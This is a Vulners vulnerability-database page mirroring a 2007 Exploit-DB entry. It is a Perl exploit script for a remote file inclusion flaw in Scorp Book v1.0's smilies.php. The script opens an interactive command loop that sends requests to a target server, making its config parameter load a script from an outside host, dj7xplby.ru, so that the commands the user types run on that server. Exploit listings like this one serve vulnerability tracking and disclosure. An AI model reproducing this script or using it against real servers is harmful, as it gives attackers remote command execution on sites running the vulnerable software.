Lucene search
+L

Scorp Book 1.0 - 'smilies.php?config' Remote File Inclusion

🗓️ 08 Apr 2007 00:00:00Reported by Dj7xplType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

Remote File Inclusion in Scorp Book v1.0 smilies.ph

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-1937
10 Apr 200723:00
cve
cvelist
Cvelist
CVE-2007-1937
10 Apr 200723:00
cvelist
euvd
EUVD
EUVD-2007-1931
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-1937
10 Apr 200723:19
nvd
prion
Prion
Remote file inclusion
10 Apr 200723:19
prion
securityvulns
securityvulns
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
9 Apr 200700:00
securityvulns
#!/usr/bin/perl
#                                                         .-""""""""-.
#                                                        /   Dj7xpl   \
#                                                       |              |
#                                                       |,  .-.  .-.  ,|
#                                                       | )(_o/  \o_)( |
#                                                       |/     /\     \|
#                                             (@_       (_     ^^     _)
#                                        _     ) \_______\__|IIIIII|__/_______________________________
#                                       (_)@8@8{}<________|-\IIIIII/-|________________________________>
#                                              )_/        \          /
#                                              (@
#
#_______________________________________________Iranian Are The Best In World___________________________________________#
#
#
#       [~] Portal.......:  Scorp Book v1.0
#	[~] Download.....:  http://www.ectona.org/download/?id=598&s=info
#	[~] Author.......:  Dj7xpl  | [email protected]
#       [~] Class........:  Remote File Include Exploit
#
#_______________________________________________________________________________________________________________________#
#########################################################################################################################

use IO::Socket;
if (@ARGV < 2){
print "

     +**********************************************************************+
     *                                                                      *
     *   # Scorp Book <== v1.0 (smilies.php) Remote File Include Exploit    *
     *                                                                      *
     *   # Usage   :  xpl.pl [Target] [Path]                                *
     *                                                                      *
     *   # Example :  xpl.pl Dj7xpl.ir /gb                                  *
     *                                                                      *
     *                       Vuln & Coded By Dj7xpl                         *
     +**********************************************************************+

";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];

print "\n[~] Please wait ...\n";

print "[~] Shell : ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
    print $socket "GET ".$path."/smilies.php?config=http://dj7xplby.ru/cmd?cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "[~] Shell : ";
    $cmd = <STDIN>;
	}

# milw0rm.com [2007-04-08]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Apr 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.03121
32